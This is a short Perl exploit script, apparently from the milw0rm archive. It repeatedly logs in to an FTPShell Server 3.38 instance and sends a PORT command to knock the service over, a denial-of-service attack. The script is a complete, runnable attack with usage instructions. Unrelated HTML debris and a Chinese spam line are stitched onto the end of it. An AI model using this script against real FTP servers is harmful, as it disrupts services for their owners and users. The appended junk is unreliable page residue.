#!/usr/bin/perl # # Usage: FTPShell_FTPDOS.pl # FTPShell_FTPDOS.pl 127.0.0.1 hello moto # # FTPshell Server Version 3.38 # # Download: # http://www.ftpshell.com/ # ################################################ use IO::Socket; use Win32; use strict; my($i) = ""; my($socket) = ""; for ($i = 1; $i <= 40; $i++) { if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Login \#$i\n"; Win32::Sleep(300); print $socket "USER $ARGV[1]\r\n"; Win32::Sleep(100); print $socket "PASS $ARGV[2]\r\n"; Win32::Sleep(100); print $socket "PORT 127,0,0,1,18,12\r\n"; Win32::Sleep(100); close($socket); } else { print "Cannot connect to $ARGV[0]:21\n"; } } # milw0rm.com [2005-07-26]

    <pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre>
    <pre id="vvttv"></pre>

      <p id="vvttv"></p>

          <p id="vvttv"></p>

                <p id="vvttv"></p>

                <pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>

                  <output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>

                    <p id="vvttv"></p>

                    这里只有精品视频